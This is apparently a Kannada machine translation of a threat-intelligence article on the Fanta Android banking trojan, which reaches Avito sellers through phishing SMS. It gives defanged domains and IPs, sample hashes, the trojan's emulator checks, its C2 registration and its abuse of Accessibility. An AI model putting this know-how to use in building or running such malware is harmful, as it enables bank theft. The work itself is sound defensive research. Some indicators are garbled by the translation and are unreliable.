ಲೇಸ್ಯಾ, ಫಾಂಟಾ: ಹಳೆಯ ಆಂಡ್ರಾಯ್ಡ್ ಟ್ರೋಜನ್‌ಗಾಗಿ ಹೊಸ ತಂತ್ರ

ಲೇಸ್ಯಾ, ಫಾಂಟಾ: ಹಳೆಯ ಆಂಡ್ರಾಯ್ಡ್ ಟ್ರೋಜನ್‌ಗಾಗಿ ಹೊಸ ತಂತ್ರ

ಒಂದು ದಿನ ನೀವು Avito ನಲ್ಲಿ ಏನನ್ನಾದರೂ ಮಾರಾಟ ಮಾಡಲು ಬಯಸುತ್ತೀರಿ ಮತ್ತು ನಿಮ್ಮ ಉತ್ಪನ್ನದ ವಿವರವಾದ ವಿವರಣೆಯನ್ನು ಪೋಸ್ಟ್ ಮಾಡಿದ ನಂತರ (ಉದಾಹರಣೆಗೆ, RAM ಮಾಡ್ಯೂಲ್), ನೀವು ಈ ಸಂದೇಶವನ್ನು ಸ್ವೀಕರಿಸುತ್ತೀರಿ:

ಲೇಸ್ಯಾ, ಫಾಂಟಾ: ಹಳೆಯ ಆಂಡ್ರಾಯ್ಡ್ ಟ್ರೋಜನ್‌ಗಾಗಿ ಹೊಸ ತಂತ್ರಒಮ್ಮೆ ನೀವು ಲಿಂಕ್ ಅನ್ನು ತೆರೆದರೆ, ಖರೀದಿಯನ್ನು ಮಾಡಲಾಗಿದೆಯೆಂದು ಸಂತೋಷ ಮತ್ತು ಯಶಸ್ವಿ ಮಾರಾಟಗಾರರಾದ ನಿಮಗೆ ಸೂಚಿಸುವ ನಿರುಪದ್ರವಿ ಪುಟವನ್ನು ನೀವು ನೋಡುತ್ತೀರಿ:

ಲೇಸ್ಯಾ, ಫಾಂಟಾ: ಹಳೆಯ ಆಂಡ್ರಾಯ್ಡ್ ಟ್ರೋಜನ್‌ಗಾಗಿ ಹೊಸ ತಂತ್ರ
ಒಮ್ಮೆ ನೀವು "ಮುಂದುವರಿಸಿ" ಬಟನ್ ಅನ್ನು ಕ್ಲಿಕ್ ಮಾಡಿದರೆ, ಐಕಾನ್ ಮತ್ತು ನಂಬಿಕೆ-ಸ್ಫೂರ್ತಿದಾಯಕ ಹೆಸರನ್ನು ಹೊಂದಿರುವ APK ಫೈಲ್ ಅನ್ನು ನಿಮ್ಮ Android ಸಾಧನಕ್ಕೆ ಡೌನ್‌ಲೋಡ್ ಮಾಡಲಾಗುತ್ತದೆ. ನೀವು ಕೆಲವು ಕಾರಣಗಳಿಗಾಗಿ ಪ್ರವೇಶಿಸುವಿಕೆ ಸೇವೆಯ ಹಕ್ಕುಗಳನ್ನು ವಿನಂತಿಸಿದ ಅಪ್ಲಿಕೇಶನ್ ಅನ್ನು ಸ್ಥಾಪಿಸಿದ್ದೀರಿ, ನಂತರ ಒಂದೆರಡು ವಿಂಡೋಗಳು ಕಾಣಿಸಿಕೊಂಡವು ಮತ್ತು ತ್ವರಿತವಾಗಿ ಕಣ್ಮರೆಯಾಯಿತು ಮತ್ತು... ಅಷ್ಟೇ.

ನಿಮ್ಮ ಬ್ಯಾಲೆನ್ಸ್ ಪರಿಶೀಲಿಸಲು ನೀವು ಹೋಗುತ್ತೀರಿ, ಆದರೆ ಕೆಲವು ಕಾರಣಗಳಿಗಾಗಿ ನಿಮ್ಮ ಬ್ಯಾಂಕಿಂಗ್ ಅಪ್ಲಿಕೇಶನ್ ನಿಮ್ಮ ಕಾರ್ಡ್ ವಿವರಗಳನ್ನು ಮತ್ತೆ ಕೇಳುತ್ತದೆ. ಡೇಟಾವನ್ನು ನಮೂದಿಸಿದ ನಂತರ, ಭಯಾನಕ ಏನಾದರೂ ಸಂಭವಿಸುತ್ತದೆ: ಕೆಲವು ಕಾರಣಗಳಿಗಾಗಿ ನಿಮಗೆ ಇನ್ನೂ ಸ್ಪಷ್ಟವಾಗಿಲ್ಲ, ನಿಮ್ಮ ಖಾತೆಯಿಂದ ಹಣವು ಕಣ್ಮರೆಯಾಗಲು ಪ್ರಾರಂಭವಾಗುತ್ತದೆ. ನೀವು ಸಮಸ್ಯೆಯನ್ನು ಪರಿಹರಿಸಲು ಪ್ರಯತ್ನಿಸುತ್ತಿದ್ದೀರಿ, ಆದರೆ ನಿಮ್ಮ ಫೋನ್ ವಿರೋಧಿಸುತ್ತದೆ: ಇದು "ಬ್ಯಾಕ್" ಮತ್ತು "ಹೋಮ್" ಕೀಗಳನ್ನು ಒತ್ತುತ್ತದೆ, ಆಫ್ ಮಾಡುವುದಿಲ್ಲ ಮತ್ತು ಯಾವುದೇ ಭದ್ರತಾ ಕ್ರಮಗಳನ್ನು ಸಕ್ರಿಯಗೊಳಿಸಲು ನಿಮಗೆ ಅನುಮತಿಸುವುದಿಲ್ಲ. ಪರಿಣಾಮವಾಗಿ, ನೀವು ಹಣವಿಲ್ಲದೆ ಉಳಿದಿದ್ದೀರಿ, ನಿಮ್ಮ ಸರಕುಗಳನ್ನು ಖರೀದಿಸಲಾಗಿಲ್ಲ, ನೀವು ಗೊಂದಲಕ್ಕೊಳಗಾಗಿದ್ದೀರಿ ಮತ್ತು ಆಶ್ಚರ್ಯಪಡುತ್ತೀರಿ: ಏನಾಯಿತು?

ಉತ್ತರ ಸರಳವಾಗಿದೆ: ನೀವು ಫ್ಲೆಕ್ಸ್‌ನೆಟ್ ಕುಟುಂಬದ ಸದಸ್ಯರಾದ ಆಂಡ್ರಾಯ್ಡ್ ಟ್ರೋಜನ್ ಫ್ಯಾಂಟಾಗೆ ಬಲಿಯಾಗಿದ್ದೀರಿ. ಇದು ಹೇಗಾಯಿತು? ಈಗ ವಿವರಿಸೋಣ.

ಲೇಖಕರು: ಆಂಡ್ರೆ ಪೊಲೊವಿಂಕಿನ್, ಮಾಲ್‌ವೇರ್ ವಿಶ್ಲೇಷಣೆಯಲ್ಲಿ ಕಿರಿಯ ತಜ್ಞ, ಇವಾನ್ ಪಿಸರೆವ್, ಮಾಲ್‌ವೇರ್ ವಿಶ್ಲೇಷಣೆಯಲ್ಲಿ ತಜ್ಞ.

ಕೆಲವು ಅಂಕಿಅಂಶಗಳು

ಆಂಡ್ರಾಯ್ಡ್ ಟ್ರೋಜನ್‌ಗಳ ಫ್ಲೆಕ್ಸ್‌ನೆಟ್ ಕುಟುಂಬವು ಮೊದಲು 2015 ರಲ್ಲಿ ತಿಳಿದುಬಂದಿದೆ. ಸಾಕಷ್ಟು ದೀರ್ಘಾವಧಿಯ ಚಟುವಟಿಕೆಯಲ್ಲಿ, ಕುಟುಂಬವು ಹಲವಾರು ಉಪಜಾತಿಗಳಿಗೆ ವಿಸ್ತರಿಸಿತು: ಫ್ಯಾಂಟಾ, ಲೈಮ್ಬಾಟ್, ಲಿಪ್ಟನ್, ಇತ್ಯಾದಿ. ಟ್ರೋಜನ್ ಮತ್ತು ಅದಕ್ಕೆ ಸಂಬಂಧಿಸಿದ ಮೂಲಸೌಕರ್ಯಗಳು ಇನ್ನೂ ನಿಲ್ಲುವುದಿಲ್ಲ: ಹೊಸ ಪರಿಣಾಮಕಾರಿ ವಿತರಣಾ ಯೋಜನೆಗಳನ್ನು ಅಭಿವೃದ್ಧಿಪಡಿಸಲಾಗುತ್ತಿದೆ - ನಮ್ಮ ಸಂದರ್ಭದಲ್ಲಿ, ನಿರ್ದಿಷ್ಟ ಬಳಕೆದಾರ-ಮಾರಾಟಗಾರರನ್ನು ಗುರಿಯಾಗಿಟ್ಟುಕೊಂಡು ಉತ್ತಮ ಗುಣಮಟ್ಟದ ಫಿಶಿಂಗ್ ಪುಟಗಳು ಮತ್ತು ಟ್ರೋಜನ್ ಅಭಿವರ್ಧಕರು ಫ್ಯಾಶನ್ ಪ್ರವೃತ್ತಿಯನ್ನು ಅನುಸರಿಸುತ್ತಾರೆ. ವೈರಸ್ ಬರವಣಿಗೆ - ಸೋಂಕಿತ ಸಾಧನಗಳು ಮತ್ತು ಬೈಪಾಸ್ ರಕ್ಷಣೆ ಕಾರ್ಯವಿಧಾನಗಳಿಂದ ಹೆಚ್ಚು ಪರಿಣಾಮಕಾರಿಯಾಗಿ ಹಣವನ್ನು ಕದಿಯಲು ಸಾಧ್ಯವಾಗುವಂತೆ ಮಾಡುವ ಹೊಸ ಕಾರ್ಯವನ್ನು ಸೇರಿಸುವುದು.

ಈ ಲೇಖನದಲ್ಲಿ ವಿವರಿಸಿದ ಅಭಿಯಾನವು ರಷ್ಯಾದ ಬಳಕೆದಾರರನ್ನು ಗುರಿಯಾಗಿರಿಸಿಕೊಂಡಿದೆ; ಉಕ್ರೇನ್‌ನಲ್ಲಿ ಕಡಿಮೆ ಸಂಖ್ಯೆಯ ಸೋಂಕಿತ ಸಾಧನಗಳನ್ನು ದಾಖಲಿಸಲಾಗಿದೆ ಮತ್ತು ಕಝಾಕಿಸ್ತಾನ್ ಮತ್ತು ಬೆಲಾರಸ್‌ನಲ್ಲಿ ಇನ್ನೂ ಕಡಿಮೆ.

ಫ್ಲೆಕ್ಸ್‌ನೆಟ್ ಆಂಡ್ರಾಯ್ಡ್ ಟ್ರೋಜನ್ ರಂಗದಲ್ಲಿ 4 ವರ್ಷಗಳಿಂದಲೂ ಇದೆ ಮತ್ತು ಅನೇಕ ಸಂಶೋಧಕರಿಂದ ವಿವರವಾಗಿ ಅಧ್ಯಯನ ಮಾಡಲ್ಪಟ್ಟಿದ್ದರೂ, ಅದು ಇನ್ನೂ ಉತ್ತಮ ಸ್ಥಿತಿಯಲ್ಲಿದೆ. ಜನವರಿ 2019 ರಿಂದ ಪ್ರಾರಂಭಿಸಿ, ಸಂಭವನೀಯ ಹಾನಿಯ ಪ್ರಮಾಣವು 35 ಮಿಲಿಯನ್ ರೂಬಲ್ಸ್ಗಳಿಗಿಂತ ಹೆಚ್ಚು - ಮತ್ತು ಇದು ರಷ್ಯಾದಲ್ಲಿ ಪ್ರಚಾರಕ್ಕಾಗಿ ಮಾತ್ರ. 2015 ರಲ್ಲಿ, ಈ ಆಂಡ್ರಾಯ್ಡ್ ಟ್ರೋಜನ್‌ನ ವಿವಿಧ ಆವೃತ್ತಿಗಳನ್ನು ಭೂಗತ ವೇದಿಕೆಗಳಲ್ಲಿ ಮಾರಾಟ ಮಾಡಲಾಯಿತು, ಅಲ್ಲಿ ವಿವರವಾದ ವಿವರಣೆಯೊಂದಿಗೆ ಟ್ರೋಜನ್‌ನ ಮೂಲ ಕೋಡ್ ಅನ್ನು ಸಹ ಕಾಣಬಹುದು. ಇದರರ್ಥ ಪ್ರಪಂಚದಲ್ಲಿನ ಹಾನಿಯ ಅಂಕಿಅಂಶಗಳು ಇನ್ನಷ್ಟು ಪ್ರಭಾವಶಾಲಿಯಾಗಿವೆ. ಅಂತಹ ಮುದುಕನಿಗೆ ಕೆಟ್ಟ ಸೂಚಕವಲ್ಲ, ಅಲ್ಲವೇ?

ಲೇಸ್ಯಾ, ಫಾಂಟಾ: ಹಳೆಯ ಆಂಡ್ರಾಯ್ಡ್ ಟ್ರೋಜನ್‌ಗಾಗಿ ಹೊಸ ತಂತ್ರ

ಮಾರಾಟದಿಂದ ವಂಚನೆಯವರೆಗೆ

ಜಾಹೀರಾತುಗಳನ್ನು Avito ಪೋಸ್ಟ್ ಮಾಡಲು ಇಂಟರ್ನೆಟ್ ಸೇವೆಗಾಗಿ ಫಿಶಿಂಗ್ ಪುಟದ ಹಿಂದೆ ಪ್ರಸ್ತುತಪಡಿಸಿದ ಸ್ಕ್ರೀನ್‌ಶಾಟ್‌ನಿಂದ ನೋಡಬಹುದಾದಂತೆ, ಇದನ್ನು ನಿರ್ದಿಷ್ಟ ಬಲಿಪಶುಕ್ಕಾಗಿ ಸಿದ್ಧಪಡಿಸಲಾಗಿದೆ. ಸ್ಪಷ್ಟವಾಗಿ, ಆಕ್ರಮಣಕಾರರು Avito ನ ಪಾರ್ಸರ್‌ಗಳಲ್ಲಿ ಒಂದನ್ನು ಬಳಸುತ್ತಾರೆ, ಇದು ಫೋನ್ ಸಂಖ್ಯೆ ಮತ್ತು ಮಾರಾಟಗಾರರ ಹೆಸರನ್ನು ಹೊರತೆಗೆಯುತ್ತದೆ, ಜೊತೆಗೆ ಉತ್ಪನ್ನದ ವಿವರಣೆಯನ್ನು ನೀಡುತ್ತದೆ. ಪುಟವನ್ನು ವಿಸ್ತರಿಸಿದ ನಂತರ ಮತ್ತು APK ಫೈಲ್ ಅನ್ನು ಸಿದ್ಧಪಡಿಸಿದ ನಂತರ, ಬಲಿಪಶು ತನ್ನ ಹೆಸರಿನೊಂದಿಗೆ SMS ಕಳುಹಿಸಲಾಗುತ್ತದೆ ಮತ್ತು ಅವನ ಉತ್ಪನ್ನದ ವಿವರಣೆ ಮತ್ತು ಉತ್ಪನ್ನದ "ಮಾರಾಟ" ದಿಂದ ಪಡೆದ ಮೊತ್ತವನ್ನು ಹೊಂದಿರುವ ಫಿಶಿಂಗ್ ಪುಟಕ್ಕೆ ಲಿಂಕ್ ಅನ್ನು ಕಳುಹಿಸಲಾಗುತ್ತದೆ. ಬಟನ್ ಕ್ಲಿಕ್ ಮಾಡುವ ಮೂಲಕ, ಬಳಕೆದಾರರು ದುರುದ್ದೇಶಪೂರಿತ APK ಫೈಲ್ ಅನ್ನು ಸ್ವೀಕರಿಸುತ್ತಾರೆ - ಫಾಂಟಾ.

shcet491[.]ru ಡೊಮೇನ್‌ನ ಅಧ್ಯಯನವು ಅದನ್ನು Hostinger ನ DNS ಸರ್ವರ್‌ಗಳಿಗೆ ನಿಯೋಜಿಸಲಾಗಿದೆ ಎಂದು ತೋರಿಸಿದೆ:

  • ns1.hostinger.ru
  • ns2.hostinger.ru
  • ns3.hostinger.ru
  • ns4.hostinger.ru

ಡೊಮೇನ್ ವಲಯ ಫೈಲ್ IP ವಿಳಾಸಗಳು 31.220.23[.]236, 31.220.23[.]243, ಮತ್ತು 31.220.23[.]235 ಗೆ ಸೂಚಿಸುವ ನಮೂದುಗಳನ್ನು ಒಳಗೊಂಡಿದೆ. ಆದಾಗ್ಯೂ, ಡೊಮೇನ್‌ನ ಪ್ರಾಥಮಿಕ ಸಂಪನ್ಮೂಲ ದಾಖಲೆ (ಎ ರೆಕಾರ್ಡ್) IP ವಿಳಾಸ 178.132.1[.]240 ನೊಂದಿಗೆ ಸರ್ವರ್‌ಗೆ ಸೂಚಿಸುತ್ತದೆ.

IP ವಿಳಾಸ 178.132.1[.]240 ನೆದರ್‌ಲ್ಯಾಂಡ್ಸ್‌ನಲ್ಲಿದೆ ಮತ್ತು ಇದು ಹೋಸ್ಟರ್‌ಗೆ ಸೇರಿದೆ ವರ್ಲ್ಡ್ಸ್ಟ್ರೀಮ್. IP ವಿಳಾಸಗಳು 31.220.23[.]235, 31.220.23[.]236 ಮತ್ತು 31.220.23[.]243 ಯುಕೆಯಲ್ಲಿವೆ ಮತ್ತು ಹಂಚಿಕೆಯ ಹೋಸ್ಟಿಂಗ್ ಸರ್ವರ್ HOSTINGER ಗೆ ಸೇರಿದೆ. ರೆಕಾರ್ಡರ್ ಆಗಿ ಬಳಸಲಾಗುತ್ತದೆ openprov-ru. ಕೆಳಗಿನ ಡೊಮೇನ್‌ಗಳನ್ನು IP ವಿಳಾಸ 178.132.1[.]240 ಗೆ ಪರಿಹರಿಸಲಾಗಿದೆ:

  • sdelka-ru[.]ru
  • tovar-av[.]ru
  • av-tovar[.]ru
  • ರು-ಸ್ಡೆಲ್ಕಾ[.]ರು
  • shcet382[.]ru
  • sdelka221[.]ru
  • sdelka211[.]ru
  • vyplata437[.]ru
  • ವಿಪ್ಲಾತ291[.]ರು
  • perevod273[.]ru
  • perevod901[.]ru

ಈ ಕೆಳಗಿನ ಸ್ವರೂಪದಲ್ಲಿನ ಲಿಂಕ್‌ಗಳು ಬಹುತೇಕ ಎಲ್ಲಾ ಡೊಮೇನ್‌ಗಳಿಂದ ಲಭ್ಯವಿವೆ ಎಂಬುದನ್ನು ಗಮನಿಸಬೇಕು:

http://(www.){0,1}<%domain%>/[0-9]{7}

ಈ ಟೆಂಪ್ಲೇಟ್ SMS ಸಂದೇಶದಿಂದ ಲಿಂಕ್ ಅನ್ನು ಸಹ ಒಳಗೊಂಡಿದೆ. ಐತಿಹಾಸಿಕ ಮಾಹಿತಿಯ ಆಧಾರದ ಮೇಲೆ, ಒಂದು ಡೊಮೇನ್ ಮೇಲೆ ವಿವರಿಸಿದ ಮಾದರಿಯಲ್ಲಿ ಹಲವಾರು ಲಿಂಕ್‌ಗಳಿಗೆ ಅನುರೂಪವಾಗಿದೆ ಎಂದು ಕಂಡುಬಂದಿದೆ, ಇದು ಹಲವಾರು ಬಲಿಪಶುಗಳಿಗೆ ಟ್ರೋಜನ್ ಅನ್ನು ವಿತರಿಸಲು ಒಂದು ಡೊಮೇನ್ ಅನ್ನು ಬಳಸಲಾಗಿದೆ ಎಂದು ಸೂಚಿಸುತ್ತದೆ.

ಸ್ವಲ್ಪ ಮುಂದೆ ಹೋಗೋಣ: SMS ನಿಂದ ಲಿಂಕ್ ಮೂಲಕ ಡೌನ್‌ಲೋಡ್ ಮಾಡಿದ ಟ್ರೋಜನ್ ವಿಳಾಸವನ್ನು ನಿಯಂತ್ರಣ ಸರ್ವರ್ ಆಗಿ ಬಳಸುತ್ತದೆ onusedseddohap[.]ಕ್ಲಬ್. ಈ ಡೊಮೇನ್ ಅನ್ನು 2019-03-12 ರಂದು ನೋಂದಾಯಿಸಲಾಗಿದೆ ಮತ್ತು 2019-04-29 ರಿಂದ ಪ್ರಾರಂಭಿಸಿ, APK ಅಪ್ಲಿಕೇಶನ್‌ಗಳು ಈ ಡೊಮೇನ್‌ನೊಂದಿಗೆ ಸಂವಹನ ನಡೆಸುತ್ತವೆ. VirusTotal ನಿಂದ ಪಡೆದ ಡೇಟಾದ ಆಧಾರದ ಮೇಲೆ, ಒಟ್ಟು 109 ಅಪ್ಲಿಕೇಶನ್‌ಗಳು ಈ ಸರ್ವರ್‌ನೊಂದಿಗೆ ಸಂವಹನ ನಡೆಸಿವೆ. ಡೊಮೇನ್ ಸ್ವತಃ IP ವಿಳಾಸಕ್ಕೆ ಪರಿಹರಿಸಲಾಗಿದೆ 217.23.14[.]27, ನೆದರ್ಲ್ಯಾಂಡ್ಸ್ನಲ್ಲಿದೆ ಮತ್ತು ಹೋಸ್ಟರ್ ಒಡೆತನದಲ್ಲಿದೆ ವರ್ಲ್ಡ್ಸ್ಟ್ರೀಮ್. ರೆಕಾರ್ಡರ್ ಆಗಿ ಬಳಸಲಾಗುತ್ತದೆ ನೇಮ್‌ಚೀಪ್. ಈ IP ವಿಳಾಸಕ್ಕೆ ಡೊಮೇನ್‌ಗಳನ್ನು ಸಹ ಪರಿಹರಿಸಲಾಗಿದೆ ಬ್ಯಾಡ್-ರಕೂನ್[.]ಕ್ಲಬ್ (2018-09-25 ರಿಂದ ಪ್ರಾರಂಭವಾಗುತ್ತದೆ) ಮತ್ತು ಕೆಟ್ಟ-ರಕೂನ್[.]ಲೈವ್ (2018-10-25 ರಿಂದ ಪ್ರಾರಂಭವಾಗುತ್ತದೆ). ಡೊಮೇನ್ ಜೊತೆಗೆ ಬ್ಯಾಡ್-ರಕೂನ್[.]ಕ್ಲಬ್ 80 ಕ್ಕೂ ಹೆಚ್ಚು APK ಫೈಲ್‌ಗಳು ಸಂವಹನ ನಡೆಸಿವೆ ಕೆಟ್ಟ-ರಕೂನ್[.]ಲೈವ್ - 100 ಕ್ಕಿಂತ ಹೆಚ್ಚು.

ಸಾಮಾನ್ಯವಾಗಿ, ದಾಳಿಯು ಈ ಕೆಳಗಿನಂತೆ ಮುಂದುವರಿಯುತ್ತದೆ:

ಲೇಸ್ಯಾ, ಫಾಂಟಾ: ಹಳೆಯ ಆಂಡ್ರಾಯ್ಡ್ ಟ್ರೋಜನ್‌ಗಾಗಿ ಹೊಸ ತಂತ್ರ

ಫಾಂಟಾದ ಮುಚ್ಚಳದ ಅಡಿಯಲ್ಲಿ ಏನಿದೆ?

ಅನೇಕ ಇತರ Android ಟ್ರೋಜನ್‌ಗಳಂತೆ, Fanta SMS ಸಂದೇಶಗಳನ್ನು ಓದಲು ಮತ್ತು ಕಳುಹಿಸಲು, USSD ವಿನಂತಿಗಳನ್ನು ಮಾಡಲು ಮತ್ತು ಅಪ್ಲಿಕೇಶನ್‌ಗಳ ಮೇಲ್ಭಾಗದಲ್ಲಿ ತನ್ನದೇ ಆದ ವಿಂಡೋಗಳನ್ನು ಪ್ರದರ್ಶಿಸಲು (ಬ್ಯಾಂಕಿಂಗ್ ಪದಗಳಿಗಿಂತ) ಸಮರ್ಥವಾಗಿದೆ. ಆದಾಗ್ಯೂ, ಈ ಕುಟುಂಬದ ಕ್ರಿಯಾತ್ಮಕತೆಯ ಆರ್ಸೆನಲ್ ಬಂದಿದೆ: ಫ್ಯಾಂಟಾ ಬಳಸಲು ಪ್ರಾರಂಭಿಸಿತು ಪ್ರವೇಶಿಸುವಿಕೆ ಸೇವೆ ವಿವಿಧ ಉದ್ದೇಶಗಳಿಗಾಗಿ: ಇತರ ಅಪ್ಲಿಕೇಶನ್‌ಗಳಿಂದ ಅಧಿಸೂಚನೆಗಳ ವಿಷಯಗಳನ್ನು ಓದುವುದು, ಸೋಂಕಿತ ಸಾಧನದಲ್ಲಿ ಟ್ರೋಜನ್ ಅನ್ನು ಪತ್ತೆಹಚ್ಚುವುದನ್ನು ತಡೆಯುವುದು ಮತ್ತು ಕಾರ್ಯಗತಗೊಳಿಸುವುದನ್ನು ನಿಲ್ಲಿಸುವುದು ಇತ್ಯಾದಿ. Fanta Android ನ ಎಲ್ಲಾ ಆವೃತ್ತಿಗಳಲ್ಲಿ 4.4 ಕ್ಕಿಂತ ಕಡಿಮೆಯಿಲ್ಲದೆ ಕಾರ್ಯನಿರ್ವಹಿಸುತ್ತದೆ. ಈ ಲೇಖನದಲ್ಲಿ ನಾವು ಈ ಕೆಳಗಿನ ಫ್ಯಾಂಟಾ ಮಾದರಿಯನ್ನು ಹತ್ತಿರದಿಂದ ನೋಡುತ್ತೇವೆ:

  • MD5: 0826bd11b2c130c4c8ac137e395ac2d4
  • SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
  • SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

ಉಡಾವಣೆಯಾದ ತಕ್ಷಣ

ಬಿಡುಗಡೆಯಾದ ತಕ್ಷಣ, ಟ್ರೋಜನ್ ತನ್ನ ಐಕಾನ್ ಅನ್ನು ಮರೆಮಾಡುತ್ತದೆ. ಸೋಂಕಿತ ಸಾಧನದ ಹೆಸರು ಪಟ್ಟಿಯಲ್ಲಿ ಇಲ್ಲದಿದ್ದರೆ ಮಾತ್ರ ಅಪ್ಲಿಕೇಶನ್ ಕಾರ್ಯನಿರ್ವಹಿಸುತ್ತದೆ:

  • android_x86
  • ವರ್ಚುವಲ್ಬಾಕ್ಸ್
  • Nexus 5X(ಬುಲ್‌ಹೆಡ್)
  • Nexus 5(ರೇಜರ್)

ಈ ತಪಾಸಣೆಯನ್ನು ಟ್ರೋಜನ್‌ನ ಮುಖ್ಯ ಸೇವೆಯಲ್ಲಿ ನಡೆಸಲಾಗುತ್ತದೆ - ಮುಖ್ಯ ಸೇವೆ. ಮೊದಲ ಬಾರಿಗೆ ಪ್ರಾರಂಭಿಸಿದಾಗ, ಅಪ್ಲಿಕೇಶನ್‌ನ ಕಾನ್ಫಿಗರೇಶನ್ ನಿಯತಾಂಕಗಳನ್ನು ಡೀಫಾಲ್ಟ್ ಮೌಲ್ಯಗಳಿಗೆ ಪ್ರಾರಂಭಿಸಲಾಗುತ್ತದೆ (ಕಾನ್ಫಿಗರೇಶನ್ ಡೇಟಾವನ್ನು ಸಂಗ್ರಹಿಸುವ ಸ್ವರೂಪ ಮತ್ತು ಅವುಗಳ ಅರ್ಥವನ್ನು ನಂತರ ಚರ್ಚಿಸಲಾಗುವುದು), ಮತ್ತು ನಿಯಂತ್ರಣ ಸರ್ವರ್‌ನಲ್ಲಿ ಹೊಸ ಸೋಂಕಿತ ಸಾಧನವನ್ನು ನೋಂದಾಯಿಸಲಾಗಿದೆ. ಸಂದೇಶ ಪ್ರಕಾರದೊಂದಿಗೆ HTTP POST ವಿನಂತಿಯನ್ನು ಸರ್ವರ್‌ಗೆ ಕಳುಹಿಸಲಾಗುತ್ತದೆ ನೋಂದಣಿ_ಬೋಟ್ ಮತ್ತು ಸೋಂಕಿತ ಸಾಧನದ ಬಗ್ಗೆ ಮಾಹಿತಿ (ಆಂಡ್ರಾಯ್ಡ್ ಆವೃತ್ತಿ, IMEI, ಫೋನ್ ಸಂಖ್ಯೆ, ಆಪರೇಟರ್ ಹೆಸರು ಮತ್ತು ಆಪರೇಟರ್ ನೋಂದಾಯಿಸಿದ ದೇಶದ ಕೋಡ್). ವಿಳಾಸವು ನಿಯಂತ್ರಣ ಸರ್ವರ್ ಆಗಿ ಕಾರ್ಯನಿರ್ವಹಿಸುತ್ತದೆ hXXp://onuseseddohap[.]club/controller.php. ಪ್ರತಿಕ್ರಿಯೆಯಾಗಿ, ಸರ್ವರ್ ಕ್ಷೇತ್ರಗಳನ್ನು ಹೊಂದಿರುವ ಸಂದೇಶವನ್ನು ಕಳುಹಿಸುತ್ತದೆ bot_id, bot_pwd, ಸರ್ವರ್ - ಅಪ್ಲಿಕೇಶನ್ ಈ ಮೌಲ್ಯಗಳನ್ನು CnC ಸರ್ವರ್‌ನ ನಿಯತಾಂಕಗಳಾಗಿ ಉಳಿಸುತ್ತದೆ. ಪ್ಯಾರಾಮೀಟರ್ ಸರ್ವರ್ ಕ್ಷೇತ್ರವನ್ನು ಸ್ವೀಕರಿಸದಿದ್ದರೆ ಐಚ್ಛಿಕ: ಫಾಂಟಾ ನೋಂದಣಿ ವಿಳಾಸವನ್ನು ಬಳಸುತ್ತದೆ - hXXp://onuseseddohap[.]club/controller.php. CnC ವಿಳಾಸವನ್ನು ಬದಲಾಯಿಸುವ ಕಾರ್ಯವನ್ನು ಎರಡು ಸಮಸ್ಯೆಗಳನ್ನು ಪರಿಹರಿಸಲು ಬಳಸಬಹುದು: ಹಲವಾರು ಸರ್ವರ್‌ಗಳ ನಡುವೆ ಲೋಡ್ ಅನ್ನು ಸಮವಾಗಿ ವಿತರಿಸಲು (ಹೆಚ್ಚಿನ ಸಂಖ್ಯೆಯ ಸೋಂಕಿತ ಸಾಧನಗಳಿದ್ದರೆ, ಆಪ್ಟಿಮೈಸ್ ಮಾಡದ ವೆಬ್ ಸರ್ವರ್‌ನಲ್ಲಿ ಲೋಡ್ ಹೆಚ್ಚಿರಬಹುದು), ಮತ್ತು ಬಳಸಲು CnC ಸರ್ವರ್‌ಗಳಲ್ಲಿ ಒಂದರ ವೈಫಲ್ಯದ ಸಂದರ್ಭದಲ್ಲಿ ಪರ್ಯಾಯ ಸರ್ವರ್.

ವಿನಂತಿಯನ್ನು ಕಳುಹಿಸುವಾಗ ದೋಷ ಸಂಭವಿಸಿದಲ್ಲಿ, ಟ್ರೋಜನ್ 20 ಸೆಕೆಂಡುಗಳ ನಂತರ ನೋಂದಣಿ ಪ್ರಕ್ರಿಯೆಯನ್ನು ಪುನರಾವರ್ತಿಸುತ್ತದೆ.

ಸಾಧನವನ್ನು ಯಶಸ್ವಿಯಾಗಿ ನೋಂದಾಯಿಸಿದ ನಂತರ, ಫಾಂಟಾ ಬಳಕೆದಾರರಿಗೆ ಈ ಕೆಳಗಿನ ಸಂದೇಶವನ್ನು ಪ್ರದರ್ಶಿಸುತ್ತದೆ:

ಲೇಸ್ಯಾ, ಫಾಂಟಾ: ಹಳೆಯ ಆಂಡ್ರಾಯ್ಡ್ ಟ್ರೋಜನ್‌ಗಾಗಿ ಹೊಸ ತಂತ್ರ
ಪ್ರಮುಖ ಟಿಪ್ಪಣಿ: ಸೇವೆಯನ್ನು ಕರೆಯಲಾಗುತ್ತದೆ ಸಿಸ್ಟಮ್ ಭದ್ರತೆ - ಟ್ರೋಜನ್ ಸೇವೆಯ ಹೆಸರು, ಮತ್ತು ಗುಂಡಿಯನ್ನು ಕ್ಲಿಕ್ ಮಾಡಿದ ನಂತರ ಸರಿ ಸೋಂಕಿತ ಸಾಧನದ ಪ್ರವೇಶಿಸುವಿಕೆ ಸೆಟ್ಟಿಂಗ್‌ಗಳೊಂದಿಗೆ ವಿಂಡೋ ತೆರೆಯುತ್ತದೆ, ಅಲ್ಲಿ ಬಳಕೆದಾರರು ದುರುದ್ದೇಶಪೂರಿತ ಸೇವೆಗಾಗಿ ಪ್ರವೇಶಿಸುವಿಕೆ ಹಕ್ಕುಗಳನ್ನು ನೀಡಬೇಕು:

ಲೇಸ್ಯಾ, ಫಾಂಟಾ: ಹಳೆಯ ಆಂಡ್ರಾಯ್ಡ್ ಟ್ರೋಜನ್‌ಗಾಗಿ ಹೊಸ ತಂತ್ರ
ಬಳಕೆದಾರರು ಆನ್ ಮಾಡಿದ ತಕ್ಷಣ ಪ್ರವೇಶಿಸುವಿಕೆ ಸೇವೆ, ಫಾಂಟಾ ಅಪ್ಲಿಕೇಶನ್ ವಿಂಡೋಗಳ ವಿಷಯಗಳಿಗೆ ಮತ್ತು ಅವುಗಳಲ್ಲಿ ನಿರ್ವಹಿಸಿದ ಕ್ರಿಯೆಗಳಿಗೆ ಪ್ರವೇಶವನ್ನು ಪಡೆಯುತ್ತದೆ:

ಲೇಸ್ಯಾ, ಫಾಂಟಾ: ಹಳೆಯ ಆಂಡ್ರಾಯ್ಡ್ ಟ್ರೋಜನ್‌ಗಾಗಿ ಹೊಸ ತಂತ್ರ
